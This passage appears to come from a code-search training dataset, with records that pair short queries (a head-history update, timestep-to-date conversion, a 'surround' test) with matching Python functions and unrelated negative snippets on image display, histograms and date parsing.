"def __init__(self, master, movie_data):\n super().__init__(master)\n self.transient()\n self.focus_set()\n\n # Display Movie Poster\n try:\n if movie_data['Poster'] != 'N/A':\n urllib.request.urlretrieve(movie_data['Poster'], \"poster.jpg\")\n image = Image.open(\"poster.jpg\")\n image = image.resize((160,240))\n else:\n image = Image.open(\"default_poster.jpg\")\n except urllib.error.HTTPError: # windows error\n image = Image.open(\"default_poster.jpg\")\n except urllib.error.URLError: # mac error\n image = Image.open(\"default_poster.jpg\")\n photo = ImageTk.PhotoImage(image)\n label = tk.Label(self, image=photo)\n label.image = photo # keep a reference!\n label.grid(row=0, column=0)\n\n # display all data\n Movie_Data_Frame = tk.Frame(self)\n year = str(movie_data['Year'])[:4]\n rating = str(movie_data['imdbRating'])\n runtime = movie_data['Runtime'].replace(' min', '')\n tk.Label(Movie_Data_Frame, text=movie_data['Title'], wraplength=300, font=('Helvetica',20)).grid(sticky='w')\n tk.Label(Movie_Data_Frame, text='Year: ' + year).grid(sticky='w')\n tk.Label(Movie_Data_Frame, text='imdb Rating: ' + rating).grid(sticky='w')\n tk.Label(Movie_Data_Frame, text='Runtime: ' + str(runtime) + ' mins').grid(sticky='w')\n tk.Label(Movie_Data_Frame, text='Plot: ' + movie_data['Plot'], wraplength=300, justify=tk.LEFT).grid(sticky='w')\n tk.Label(Movie_Data_Frame, text='Genre: ' + movie_data['Genre'], wraplength=300, justify=tk.LEFT).grid(sticky='w')\n tk.Label(Movie_Data_Frame, text='Director: ' + movie_data['Director']).grid(sticky='w')\n tk.Label(Movie_Data_Frame, text='Actors: ' + movie_data['Actors'], wraplength=300, justify=tk.LEFT).grid(sticky='w')\n tk.Label(Movie_Data_Frame, text='Awards: ' + movie_data['Awards'], wraplength=300, justify=tk.LEFT).grid(sticky='w')\n Movie_Data_Frame.grid(row=0, column=1)\n tk.Button(self, text='Save Movie', command=lambda : self.writeToFile(movie_data)).grid(sticky=\"nsew\")",
"def showFrame(self):\r\n if self.frameArray is None:\r\n print(\"please get an image from Nao with the method updateFrame()\")\r\n else:\r\n cv2.imshow(\"current frame\", self.frameArray)",
"def save_image(*args, **kwargs): # real signature unknown; restored from __doc__\n pass",
"def movieInfo(numFrames=bool, frameCount=bool, negTimesOK=bool, quickTime=bool, width=bool, timeCode=bool, dropFrame=bool, timeScale=bool, movieTexture=bool, height=bool, timeCodeTrack=bool, twentyFourHourMax=bool, counter=bool, frameDuration=bool):\n pass",
"def image(self, obj):",
"def capture(self):\n # insert the canvas\n self.fitsimage.add(self.canvas, tag='mycanvas')",
"def snapshot(self):\n ts = datetime.datetime.now() # grab the current timestamp\n filename = \"{}.png\".format(ts.strftime(\n \"%Y-%m-%d_%H-%M-%S\")) # construct filename\n\n ok, frame = self.cap.read()\n image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n image = Image.fromarray(image)\n\n # save image as jpeg file\n image.save('exports/snapshots/' + filename, \"PNG\")\n print(\"[INFO] saved {}\".format(filename))",
"def displayImage(self, iFrame, img=None):\n if not img:\n imgPath = self.imgList[iFrame.currImg]\n #img = Image.open(imgPath);\n img = mpimg.imread(imgPath);\n # if img.mode == \"I;16\":\n # print \"16 bit image, converting to 8 bit\"\n # img.mode = 'I'\n # img = img.point(lambda i:i*(1./256.)).convert(\"RGB\");\n # img = img.resize((self.ni, self.nj))\n\n #iframe keeps track of its image\n iFrame.image = img\n\n #if point is generated, gotta draw squares first\n if self.point3d:\n point = self.allUVs[iFrame.currImg];\n self.drawBox(iFrame, point)\n\n # store photo image (probably not needed in iFrame)\n # iFrame.tkpi = ImageTk.PhotoImage(img)\n iFrame.tkpi = plt.imshow(img)\n\n #update frames' label\n # iFrame.labString.set(\"img {0}\".format(iFrame.currImg))\n\n # #create new label image\n # if iFrame.label_image :\n # iFrame.label_image.destroy()\n # iFrame.label_image = Label(iFrame.frame, image=iFrame.tkpi)\n # iFrame.label_image.image = iFrame.tkpi\n # iFrame.label_image.bind(\"<Button-1>\", lambda event, arg=iFrame: self.runprobe(event, iFrame))\n # iFrame.label_image.bind(\"<Button-3>\", lambda event, arg=iFrame: self.nextImage(event, iFrame))\n # iFrame.label_image.bind(\"<Button-2>\", lambda event, arg=iFrame: self.prevImage(event, iFrame))\n # iFrame.label_image.pack(side = LEFT);",
"def test_make_movie_callable(self):\n image_dir = os.path.join('..', 'figs')\n image_base = os.path.join(image_dir, 'bio')\n self.biosim._image_base = image_base\n self.biosim.simulate(num_years=3, vis_years=1)\n self.biosim.make_movie()",
"def writeFrame(self, frameNum, img):\n # use me pattern in for dest\n frameFilename = self.dest % frameNum\n print \"write \" + frameFilename\n # write file\n if not(img):\n img = Image.new(\"RGB\", self.size, \"White\")\n img.save(frameFilename, 'PNG')",
"def update_display(self):\n self.disp.image(self.image)\n self.disp.display()",
"def showVideo(self): \n try:\n cv2.namedWindow(self.parking_id,cv2.WINDOW_NORMAL)\n img = self.img\n cv2.imshow(self.parking_id,img)\n if cv2.waitKey(1) & 0xFF == 27:\n self.logger.warn('Show video stopped along with main execution, due to ESC key pressed')\n self.logger.warn('Stopping thread of frame obtention ...')\n cv2.destroyAllWindows()\n self.stream_thread.stop()\n sys.exit(1)\n except Exception as e:\n self.logger.error('Exception during show video: {}'.format(e))\n self.logger.error(\"Error during send Hist img process: {}\".format(e))\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n self.logger.error(exc_type, fname, exc_tb.tb_lineno)",
"def __writeFrame(self, saveDir=\"./ballData\"):\r\n if not os.path.exists(saveDir):\r\n os.makedirs(saveDir)\r\n saveName = str(int(time.time()))\r\n saveImgPath = os.path.join(saveDir, saveName + \".jpg\")\r\n try:\r\n cv2.imwrite(saveImgPath, self.frameArray)\r\n except:\r\n print(\"Error when saveing current frame!\")"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
calculates h_t = h_{t-1} + d (w_t - (af_t / r pi^2) - h_{t-1}) and appends it to head history
|
def _update_head(self):
wl = self.wl + self.seasonal_component()
prev_h = self.head_history[-1]
new_h = prev_h + self.d * (wl - self.flow_component() - prev_h)
self.head_history.append(new_h)
|
[
"def updateMotionHistory(silhouette, mhi, timestamp, duration):\n pass",
"def history_RewardTensor(env, h):\n StateHists = StateHistsIx(env, h)\n Zh = len(StateHists)\n dims = list(env.R.shape)\n dims[1] = Zh\n dims[-1] = Zh\n\n Rh = np.zeros(dims)\n for h, hist in enumerate(StateHists):\n for h_, hist_ in enumerate(StateHists):\n Rh[:, h, ..., h_] = env.R[:, hist[-1], ..., hist_[-1]]\n return Rh",
"def make_hist_lookuptable(eta_ls, pT_ls, sample=None, hist_type=None, bin_info_ls=None):#sample_ls, hist_type_ls, ):\n from ROOT import TH1F\n \n hist_dict = {}\n for k in range(len(eta_ls)-1):\n eta_min = eta_ls[k]\n eta_max = eta_ls[k+1]\n eta_key = \"{}eta{}\".format(eta_min, eta_max)\n\n for j in range(len(pT_ls)-1):\n pT_min = pT_ls[j]\n pT_max = pT_ls[j+1]\n pT_key = \"{}pT{}\".format(pT_min, pT_max)\n\n # for sample in sample_ls:\n # for h_type in hist_type_ls:\n if sample is None:\n h_name = \"h_{}_{}_{}\".format(eta_key, pT_key, hist_type)\n else:\n # Sample specific.\n h_name = \"h_{}_{}_{}_{}\".format(eta_key, pT_key, sample, hist_type)\n print(f\"Making h_name: {h_name}\")\n \n # x_min = bin_dict[sample][h_type][0]\n # x_max = bin_dict[sample][h_type][1]\n # bwidth = bin_dict[sample][h_type][2]\n\n x_min = bin_info_ls[0]\n x_max = bin_info_ls[1]\n bwidth = bin_info_ls[2]\n n_bins = calc_num_bins(*bin_info_ls)\n # n_bins = int(round( (x_max - x_min)/float(bwidth) ))\n \n hist_dict[h_name] = TH1F(h_name, h_name, n_bins, x_min, x_max)\n hist_dict[h_name].Sumw2()\n \n return hist_dict",
"def history_TransitionTensor(env, h):\n Hists = StateHistsIx(env, h)\n\n Zh = len(Hists)\n Th_dims = list(env.T.shape)\n Th_dims[0] = Zh\n Th_dims[-1] = Zh\n Th = np.ones(Th_dims)\n\n for i, hist in enumerate(Hists):\n for j, hist_ in enumerate(Hists):\n possible = hist[1:] == hist_[:-1] # Is the transition possible?\n Th[i, ..., j] = possible*env.T[hist[-1],...,hist_[-1]]\n\n return Th",
"def make_input_hist(self):\n ch_names = {\n self.ee_ch_name: 0,\n self.mm_ch_name: 1,\n }\n hist_temp = ROOT.TH1F(\"temp\", \"template\", 30, 0., 1500.)\n\n out_name = self.get_input_hist_name()\n fout = ROOT.TFile.Open(out_name, 'recreate')\n for chan, cut in ch_names.iteritems():\n # signal only shape\n sig_name = \"mT_\"+chan+\"_signal\"\n h_sig = hist_temp.Clone(sig_name)\n weight = \"w_H___\"+str(self.mass)+\"_\"+str(self.width)+\"*(pass_to_SR==1 && event_type==\"+str(cut)+\")\"\n self.tree.Draw(\"mT_ZZ>>\"+h_sig.GetName(), weight)\n h_sig.Scale(1000)\n h_sig.Write()\n h_sig_clone = h_sig.Clone(\"mT-Nominal-\"+chan)\n h_sig_clone.Write()\n\n # interference of higgs and Higgs\n int_hH_name = \"mT_\"+chan+\"_hH\"\n h_hH = hist_temp.Clone(int_hH_name)\n weight = \"w_h_H_\"+str(self.mass)+\"_\"+str(self.width)+\"*(pass_to_SR==1 && event_type==\"+str(cut)+\")\"\n self.tree.Draw(\"mT_ZZ>>\"+h_hH.GetName(), weight)\n h_hH.Scale(1000)\n h_hH.Write()\n\n # interference of Higgs and background\n int_HB_name = \"mT_\"+chan+\"_HB\"\n h_HB = hist_temp.Clone(int_HB_name)\n weight = \"w_H_B_\"+str(self.mass)+\"_\"+str(self.width)+\"*(pass_to_SR==1 && event_type==\"+str(cut)+\")\"\n self.tree.Draw(\"mT_ZZ>>\"+h_HB.GetName(), weight)\n h_HB.Scale(1000)\n h_HB.Write()\n fout.Close()",
"def update_history(history, index, mus):\n\n # pull arm i\n x_it = get_sample(mus[index])\n history[index][0] += x_it\n history[index][1] += 1.0\n return history",
"def history_ObservationTensor(env, h):\n StateHists = StateHistsIx(env, h)\n ObsHists = ObsHistsIx(env, h)\n\n Qh = len(ObsHists)\n Zh = len(StateHists)\n Oh = np.ones((env.N, Zh, Qh))\n\n for i, shist in enumerate(StateHists):\n for j, ohist in enumerate(ObsHists):\n Oh[:, i, j] = np.prod([env.O[:, shist[k], ohist[k]]\n for k in range(len(shist))], axis=0)\n \n return Oh",
"def saveHistory(self):\n self.time_his.append(self.curr_time)\n self.yaw_his.append(self.yaw)\n self.psiDot_his.append(self.psiDot)\n self.ax_his.append(self.ax)\n self.ay_his.append(self.ay)\n self.roll_his.append(self.roll)\n self.pitch_his.append(self.pitch)",
"def histSjA_RewardTensor(env, h):\n hmax=max(h) # the maximum history length\n l = (env.N+1)*hmax # length of a single history representation\n \n SAHists = StateActHistsIx(env, h)\n\n # dimension for history reward tensor\n Zh = len(SAHists)\n dims = list(env.R.shape)\n dims[1] = Zh\n dims[-1] = Zh\n\n Rh = np.zeros(dims) # init reward tensor\n # go through all pairs of histories\n for i, hist in enumerate(SAHists):\n for j, hist_ in enumerate(SAHists):\n hix, ix = _transition_ix(env, h, i, hist, j, hist_)\n hix = tuple([slice(env.N)]+list(hix))\n ix = tuple([slice(env.N)]+list(ix))\n Rh[hix] = env.R[ix]\n \n return Rh",
"def _update_h(self):\n pass",
"def h( self , x , u , t ):\n \n #y = np.zeros(self.p) # Output vector\n \n y = self.sys.h( x , self.sys.ubar , t )\n \n return y",
"def calc_Qh(self):\n qh = self.qh_at_t1() \n\n # Find q hat at each time step by stepping backwards in time from qh1\n p = TestFunction(self.V)\n qh_prev = TrialFunction(self.V)\n \n a = inner(p, qh_prev)*dx\n A = assemble(a)\n\n qh_prev = Function(self.V) # unknown at next timestep\n\n u = Function(self.V)\n q = Function(self.V)\n \n for n in reversed(xrange(self.N)):\n u.assign(self.U[n])\n q.assign(self.Q[n])\n j = self.j(q)\n\n c = 0.5*(inner(u,u)/j - (self.alpha_sq)*self.j(u)**2/j**3)\n\n L = inner(p,qh)*dx - inner(c*p.dx(0),q.dx(0))*self.dt*dx\n \n b = assemble(L)\n\n solve(A, qh_prev.vector(), b)\n\n qh.assign(qh_prev)\n\n self.Qh[n].assign(qh)",
"def _h_function(self,h):\n return self.contribution * np.exp(-1.0 * h / self.a)",
"def forward(self, h_prev, x_t):\n # softmax(arr, axis=0)\n m, i = x_t.shape\n Wi = self.Wh[:i]\n Wh = self.Wh[i:]\n cat = np.concatenate((h_prev, x_t), axis=1)\n # print('meow', cat.shape)\n h_next = np.tanh(cat @ self.Wh + self.bh)\n y = self.softmax(h_next @ self.Wy + self.by)\n return h_next, y",
"def theta_h(self):\n if self._theta_h is not None:\n return self._S\n theta_h = 0.0\n n = self.n_hap\n nnm1 = n*(n-1.)/2.\n for i,site in enumerate(self.sfs):\n pi += site * i * i",
"def update_hx(self, time=0, hx = None, hx_idx = None):\n\t\tif hx_idx is not None:\n\t\t\tself.hx_discrete[time]=hx_idx\n\t\telif hx is not None:\n\t\t\tidx = np.argmin(np.abs(self.h_set-hx))\n\t\t\tself.hx_discrete[time] = idx\n\t\telse:\n\t\t\tassert False, \"Error in update_hx in Hamiltonian class\"",
"def update_step(self, t, replay_buffer, lr):\r\n\r\n s_batch, a_batch, r_batch, sp_batch, done_mask_batch = replay_buffer.sample(\r\n self.config.batch_size)\r\n \r\n\r\n fd = {\r\n # inputs\r\n self.s: s_batch,\r\n self.a: a_batch,\r\n self.r: r_batch,\r\n self.sp: sp_batch, \r\n self.done_mask: done_mask_batch,\r\n self.lr: lr, \r\n # extra info\r\n self.avg_reward_placeholder: self.avg_reward, \r\n self.max_reward_placeholder: self.max_reward, \r\n self.std_reward_placeholder: self.std_reward, \r\n self.avg_q_placeholder: self.avg_q, \r\n self.max_q_placeholder: self.max_q, \r\n self.std_q_placeholder: self.std_q, \r\n self.eval_reward_placeholder: self.eval_reward, \r\n }\r\n\r\n if self.config.lwf:\r\n fd[self.eval_reward_old_placeholder] = self.eval_reward_old\r\n\r\n if self.config.noise:\r\n state_shape = list(self.env.observation_space.shape)\r\n img_height, img_width, nchannels = state_shape\r\n if t > 0 and t % self.config.num_adv_iter == 0 and self.config.adv:\r\n\t\t self.noise_update = 255*self.noise_update/np.max(self.noise_update, axis=(1,2,3), keepdims=True)\r\n #print 'Adding adversarial noise', self.noise_update\r\n noise = self.noise_update + self.prev_noise\r\n noise_min = np.min(noise, axis=(1,2,3), keepdims=True)\r\n noise_zero = noise - noise_min\r\n noise_max = np.max(noise_zero, axis=(1,2,3), keepdims=True)\r\n noise_scaled = 255*(noise_zero/noise_max)\r\n noise = noise_scaled.astype(np.uint8)\r\n else:\r\n noise = np.random.choice(np.arange(256, dtype=np.uint8), replace=True, size=[self.config.batch_size, \\\r\n img_height, img_width, nchannels*self.config.state_history])\r\n fd[self.n] = noise\r\n self.prev_noise = noise\r\n\r\n if self.config.adv:\r\n\t loss_eval, grad_norm_eval, summary, self.noise_update, _ = self.sess.run([self.loss, \\\r\n self.grad_norm, self.merged, self.noise_grad, self.train_op], feed_dict=fd)\r\n else:\r\n loss_eval, grad_norm_eval, summary, _ = self.sess.run([self.loss, \\\r\n self.grad_norm, self.merged, self.train_op], feed_dict=fd)\r\n \r\n\r\n\r\n # tensorboard stuff\r\n self.file_writer.add_summary(summary, t)\r\n \r\n return loss_eval, grad_norm_eval",
"def _cal_hoag(self) -> AbstractHOAG:\n # 读入梯度信息\n with open(self.our_work, \"r\") as fp:\n lines = fp.readlines()\n # 计算loss的值\n loss = [float(line.strip().split()[0]) for line in lines]\n gradient = []\n for i in range(1, len(loss)):\n gradient.append((loss[i] - loss[i - 1]) * len(loss))\n hoag = DummyHOAG(0.00095, 1, np.array(gradient))\n\n return hoag",
"def __init__(self, wh_p=4.5, ua=0.0019678, eta=1, t2=49, d=0.55, h=1.0):\n self.WH_P = wh_p #[kJ/sec] rated power of water heater\n self.UA = ua #[kJ/(sec C)] = 7.084 kJ/hr-C\n self.eta_c = eta #[none] recovery efficiency\n self.T2 = t2 #[C] initial temperature of top node in Celsius\n self.diameter = d #[m] tank diameter in meters\n self.height = h #[m] tank height in meters\n self.T1 = self.T2 - 1 #[C] bottom node temperature\n self.Cp = 4.1818 #[kJ/(kg C)] heat capacity of water\n self.D = 1000 #[kg/m^3] density of water\n self.volume = self.height * np.pi * (self.diameter / 2)**2 #[m^3]\n self.S_top = 0.25 * np.pi * self.diameter**2 #[m^2] top area\n self.S_side = np.pi * self.diameter * self.height #[m^2] side area\n self.S_total = self.S_top * 2 + self.S_side #[m^2] total area\n self.UA1 = self.UA*(self.S_top+(2./3.)*self.S_side)/self.S_total #bottom UA\n self.UA2 = self.UA*(self.S_top+(1./3.)*self.S_side)/self.S_total #top UA\n self.C1 = self.volume * (2./3.) * self.D * self.Cp #bottom\n self.C2 = self.volume * (1./3.) * self.D * self.Cp #top\n self.phi, self.gamma = None, None"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
convert timestep to datetime and return (month, weekday, hour)
|
def t_to_month_weekday_hour(self):
dt = self.t0_datetime + timedelta(minutes=self.t * self.ts_size)
return (int(dt.month), int(dt.weekday()), int(dt.hour))
|
[
"def transform_date(observation):\n \n date_ = observation.get(\"Date\")\n \n try:\n date = pd.Timestamp(date_)\n hour = date.hour\n month = date.month\n day_of_week = date.day_name()\n except:\n hour = 0\n month = 0\n day_of_week = '' \n\n return hour, month, day_of_week",
"def split_timestamp(dto):\n return tuple(dto.strftime(\"%Y %m %d %H\").split())",
"def timestamp_to_week_and_hour(tmpstmp):\n date = datetime.fromtimestamp(tmpstmp)\n week = date.isocalendar()[1] - 1\n return week, date.hour",
"def time_of_trip(datum, city):\n \n # YOUR CODE HERE\n if city=='NYC':\n date_object=datetime.strptime(datum['starttime'],'%m/%d/%Y %H:%M:%S')\n elif city=='Chicago':\n date_object=datetime.strptime(datum['starttime'],'%m/%d/%Y %H:%M')\n else:\n date_object=datetime.strptime(datum['Start date'],'%m/%d/%Y %H:%M')\n\n print('The date is {}'.format(date_object))\n month=date_object.month\n hour=date_object.hour\n day_of_week=date_object.strftime('%A')\n print('The month is {} , the hour is {} and the day of week is {}'.format(month,hour,day_of_week))\n \n return (month, hour, day_of_week)",
"def dti2step(self, dt):\n\n dt = pd.Timestamp(dt)\n if dt.hour == 0: # Datetime only has date.\n dt = dt + pd.Timedelta(self.start_hour + ':00') # Add time to the date.\n step = self.dti.get_loc(dt) * 60\n return step",
"def get_hhmm(time_str): \n (hh, mmxx) = time_str.split(':')\n hh = int(hh)\n mm = int(mmxx[:2])\n xx = mmxx[2:]\n if xx == 'PM': \n hh += 12\n return [hh, mm]",
"def time_of_trip(datum, city):\n \n # YOUR CODE HERE\n if city == 'NYC':\n #Matching time format with the data\n time= datetime.strptime(datum['starttime'],'%m/%d/%Y %H:%M:%S')\n month= int(time.strftime(\"%-m\")) #storing month value\n day_of_week= str(datetime.strptime(datum['starttime'],'%m/%d/%Y %H:%M:%S').strftime(\"%A\")) #storing day name\n hour= int(time.strftime(\"%-H\")) #storing hour value\n elif city=='Chicago':\n time= datetime.strptime(datum['starttime'],'%m/%d/%Y %H:%M')\n month= int(time.strftime(\"%-m\"))\n day_of_week= str(datetime.strptime(datum['starttime'],'%m/%d/%Y %H:%M').strftime(\"%A\"))\n hour= int(time.strftime(\"%-H\"))\n elif city== 'Washington':\n time= datetime.strptime(datum['Start date'],'%m/%d/%Y %H:%M')\n month= int(time.strftime(\"%-m\"))\n day_of_week= str(datetime.strptime(datum['Start date'],'%m/%d/%Y %H:%M').strftime(\"%A\"))\n hour= int(time.strftime(\"%-H\"))\n \n return (month, hour, day_of_week)",
"def get_time_arrays():\n\thours = [str(i).zfill(2) for i in range(25)]\n\tminutes = [str(i).zfill(2) for i in range(60)]\n\treturn hours, minutes",
"def convert_to_datetime(line):\n data = line.split(' ')\n line_datetime = data[1].split('T')\n line_date = [int(x) for x in line_datetime[0].split('-')]\n line_time = [int(x) for x in line_datetime[1].split(':')]\n return datetime(line_date[0], line_date[1], line_date[2], line_time[0], line_time[1], line_time[2])",
"def durationlist2datetime(duration_split):\n assert len(duration_split)%2 == 0\n digits = []\n if len(duration_split) == 4:\n # case # h # m\n digits = [int(duration_split[0]), int(duration_split[2])] \n elif len(duration_split) == 2:\n if duration_split[1] == 'm':\n digits = [0, int(duration_split[0])]\n elif duration_split[1] == 'h':\n digits = [int(duration_split[0]), 0]\n else:\n raise ValueError('duration string should be in the form # m, # h, or # h # m')\n assert len(digits) != 0\n duration_datetime = timedelta(hours = digits[0], minutes=digits[1])# datetime.strptime('::'.join(digits),'%H::%M')\n return duration_datetime",
"def convert_words_to_datetime(input_bytes):\n if len(input_bytes) != 6:\n raise SampleException(\"Invalid number of bytes in input! Found %s\" % len(input_bytes))\n\n minutes, seconds, day, hour, year, month, = struct.unpack('<6B', input_bytes)\n\n minutes = int('%02x' % minutes)\n seconds = int('%02x' % seconds)\n day = int('%02x' % day)\n hour = int('%02x' % hour)\n year = int('%02x' % year)\n month = int('%02x' % month)\n\n return [minutes, seconds, day, hour, year, month]",
"def __splitTime(sec):\n minute, sec = divmod(sec, 60)\n hour, minute = divmod(minute, 60)\n return hour, minute, sec",
"def parse_timestep(self, timestep):\n ts = timestep[0]\n obs, reward, done = ts.observation, ts.reward, ts.step_type == StepType.LAST\n # add step_mul to obs\n\n setattr(obs, 'step_mul', self.step_mul)\n setattr(obs, 'map_size', self.env_instance._interface_formats[0]._raw_resolution)\n\n return obs, reward, done",
"def time_param(S):\n # dt\n dt = datetime.strptime(S['Time_step'], S['Time_format']).time()\n if dt.hour != 0 and dt.minute == 0 and dt.second == 0:\n dt = dt.hour\n elif dt.hour == 0 and dt.minute != 0 and dt.second == 0:\n dt = dt.minute / 60\n else:\n print_error('Period_length')\n \n Datetime_format = S['Date_format'] + ' ' + S['Time_format']\n start = S['Period_start'] + ' ' + S['Period_start_time']\n dt_start = datetime.strptime(start, Datetime_format)\n end = S['Period_end'] + ' ' + S['Period_start_time']\n dt_end = datetime.strptime(end, Datetime_format)\n \n # Nbr_of_time_steps\n Nbr_of_time_steps = (((dt_end - dt_start).days + 1) * 24) / dt\n Nbr_of_time_steps_per_day = 24 / dt\n \n # Period index\n if (int(Nbr_of_time_steps) == Nbr_of_time_steps and \n int(Nbr_of_time_steps_per_day) == Nbr_of_time_steps_per_day):\n Periods = list(range(0, int(Nbr_of_time_steps)))\n else:\n print_error('time_step_int')\n \n # Day index\n Days = list(range((dt_end - dt_start).days))\n \n # Hour index\n Hours = list(range(0,24))\n \n # Date of each day\n Day_dates = [dt_end - timedelta(days=i) for i in range(len(Days))]\n\n Time = []\n for t in range(0, int(Nbr_of_time_steps_per_day)):\n Time.append(datetime.strftime(Day_dates[0] + timedelta(hours=t*dt), S['Time_format'])) \n \n return Periods, Nbr_of_time_steps, dt, Day_dates, Time, dt_end, Days, Hours",
"def integration_times(hdulist):\n int_times = hdulist['INT_TIMES'].data\n starting = int_times['int_start_MJD_UTC']\n mid = int_times['int_mid_MJD_UTC']\n ending = int_times['int_end_MJD_UTC']\n return starting, mid, ending",
"def timedelta_to_waq_timestep(td):\n total_seconds = td.total_seconds()\n assert td.microseconds==0\n secs = total_seconds % 60\n mins = (total_seconds // 60) % 60\n hours = (total_seconds // 3600) % 24\n days = (total_seconds // 86400)\n \n # seconds\n # minutes\n # hours\n # days\n # hydrodynamic-timestep '00000000 00 3000'\n \n return \"%08d%02d%02d%02d\"%(days, hours, mins, secs)",
"def _get_time_step(self):\n if self.data_level == 1:\n self.dt = self._dt_min\n elif self.data_level == 2:\n self.dt = self._dt_min * 128\n elif self.data_level == 3:\n self.dt = self._dt_min * 128 * 128\n else:\n print \"ERROR: data level must be set\"",
"def convert_time_format(otime):\n\n save = []\n prev = 0\n for ent in otime:\n out = Chandra.Time.DateTime(ent).date\n atemp = re.split(':', out)\n\n year = int(atemp[0])\n yday = float(atemp[1])\n hh = float(atemp[2])\n mm = float(atemp[3])\n ss = float(atemp[4])\n\n yday += hh /24.0 + mm / 1440.0 + ss / 86400.0\n\n if prev == 0:\n prev = year\n save.append(yday)\n if mcf.is_leapyear(year):\n base = 366\n else:\n base = 365\n else:\n if year != prev:\n save.append(yday + base)\n else:\n save.append(yday)\n\n return [save, prev]",
"def get_weekday_time() -> list:\n return [DAYS[date.today().weekday()], get_utc_time()]"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
testing the surround() method
|
def test1(self):
self.field.surround()
self.assertEqual(self.field, [
[None, None, None, None, None],
[None, 1 , 2 , 3 , None],
[None, 4 , 5 , 6 , None],
[None, 7 , 8 , 9 , None],
[None, 10 , 11 , 12 , None],
[None, None, None, None, None],
])
|
[
"def test_surround_adds_two_extra_lines(self):\n label_surrounded_string = self.g._surround_with_label(\n self.graph_string,\n 100,\n 4,\n 0,\n 1.29,\n 2.5\n )\n assert len(label_surrounded_string.splitlines()) == len(self.graph_string.splitlines()) + 2",
"def test_surround_adds_three_lines_with_timestamps(self):\n label_surrounded_string = self.g._surround_with_label(\n self.graph_string,\n 100,\n 4,\n 0,\n 1.29,\n 2.5,\n start_ctime='Wed Jan 1 00:00:00 2020',\n end_ctime='Sun Jan 5 00:00:00 2020',\n )\n assert len(label_surrounded_string.splitlines()) == len(self.graph_string.splitlines()) + 3",
"def html_surround(phrase, tag=\"strong\"):\n\n return \"<\" + tag + \">\" + str(phrase) + \"</\" + tag + \">\"",
"def test_to_string_with_indent(self):\n self.sut = BlockObject('bar')\n\n self.sut._indent()\n first = str(self.sut)\n self.sut._dedent()\n\n second = ' bar {' + os.linesep\n second += ' }' + os.linesep\n\n self.assertEqual(first, second)",
"def bannerline ( s, char='-', size=6, surround=True ):\n s = f\" {s} \"\n if surround: print()\n print(tc.colored(s.center(len(s) + size, char), gColor))\n if surround: print()",
"def test_unclosed_tags_get_closed(self):\n ...",
"def wrap(text, open_tag, close_tag):\n return ''.join((open_tag, text, close_tag, ))",
"def test_removal_of_enclosing_on_string(enclosing, value, inplace):\n\n if enclosing == \"{0}\":\n _skip_pseudo_enclosing_value(value)\n\n # Create test string\n key = \"someKey\"\n raw = f\"<--- does not matter for this unit test -->\"\n start_line = 5\n\n original = String(\n start_line=start_line, key=key, raw=raw, value=enclosing.format(value)\n )\n\n middleware = RemoveEnclosingMiddleware(allow_inplace_modification=inplace)\n\n transformed_library = middleware.transform(library=Library([original]))\n\n # Assert correct library state\n assert len(transformed_library.blocks) == 1\n assert len(transformed_library.strings) == 1\n # Assert correct removal of enclosing\n transformed = transformed_library.strings[0]\n assert transformed.value == value\n expected_enclosing = (\n enclosing.format(\"\")[0] if enclosing != \"{0}\" else \"no-enclosing\"\n )\n assert transformed.parser_metadata[\"removed_enclosing\"] == expected_enclosing\n # Assert remaining fields are unchanged\n assert transformed.start_line == start_line\n assert transformed.key == key\n assert transformed.raw == raw\n\n # Assert `allow_inplace_modification` is respected\n assert_inplace_is_respected(inplace, original, transformed)",
"def test_spaces_outside_section(self):\n self.assertContains('enwiki_help_editing', 'Naming and_moving')\n self.assertContains('enwiki_help_editing', ' Naming and_moving ')\n self.assertContains('enwiki_help_editing', ' Naming and_moving_')",
"def highlight_surrounding_brackets():\n open_bracket, close_bracket = current_bracket_scope()\n if open_bracket and close_bracket:\n vim.command(MATCH_POS.format(\n row=open_bracket[0],\n column=open_bracket[1]))\n vim.command(MATCH_POS.format(\n row=close_bracket[0],\n column=close_bracket[1]))",
"def add_escapement_back_in_group(text):\n escaped_text = \"\"\n for c in text:\n if ( c == ESCAPE_SYM or is_boundary_sym(c)\n or is_group_modifier_sym(c) or is_comment_sym(c)):\n escaped_text += ESCAPE_SYM + c\n else:\n escaped_text += c\n escaped_text = add_escapement_back_for_not_comments(escaped_text)\n return escaped_text.replace(ESCAPE_SYM+ESCAPE_SYM+ARG_SYM, ESCAPE_SYM+ARG_SYM)",
"def test_wrap():\n # Start with a fairly simple test where the image is 4 copies of the same data:\n im_orig = galsim.Image([[ 11., 12., 13., 14., 11., 12., 13., 14. ],\n [ 21., 22., 23., 24., 21., 22., 23., 24. ],\n [ 31., 32., 33., 34., 31., 32., 33., 34. ],\n [ 41., 42., 43., 44., 41., 42., 43., 44. ],\n [ 11., 12., 13., 14., 11., 12., 13., 14. ],\n [ 21., 22., 23., 24., 21., 22., 23., 24. ],\n [ 31., 32., 33., 34., 31., 32., 33., 34. ],\n [ 41., 42., 43., 44., 41., 42., 43., 44. ]])\n im = im_orig.copy()\n b = galsim.BoundsI(1,4,1,4)\n im_quad = im_orig[b]\n im_wrap = im.wrap(b)\n np.testing.assert_almost_equal(im_wrap.array, 4.*im_quad.array, 12,\n \"image.wrap() into first quadrant did not match expectation\")\n\n # The same thing should work no matter where the lower left corner is:\n for xmin, ymin in ( (1,5), (5,1), (5,5), (2,3), (4,1) ):\n b = galsim.BoundsI(xmin, xmin+3, ymin, ymin+3)\n im_quad = im_orig[b]\n im = im_orig.copy()\n im_wrap = im.wrap(b)\n np.testing.assert_almost_equal(im_wrap.array, 4.*im_quad.array, 12,\n \"image.wrap(%s) did not match expectation\"%b)\n np.testing.assert_array_equal(im_wrap.array, im[b].array,\n \"image.wrap(%s) did not return the right subimage\")\n im[b].fill(0)\n np.testing.assert_array_equal(im_wrap.array, im[b].array,\n \"image.wrap(%s) did not return a view of the original\")\n\n # Now test where the subimage is not a simple fraction of the original, and all the\n # sizes are different.\n im = galsim.ImageD(17, 23, xmin=0, ymin=0)\n b = galsim.BoundsI(7,9,11,18)\n 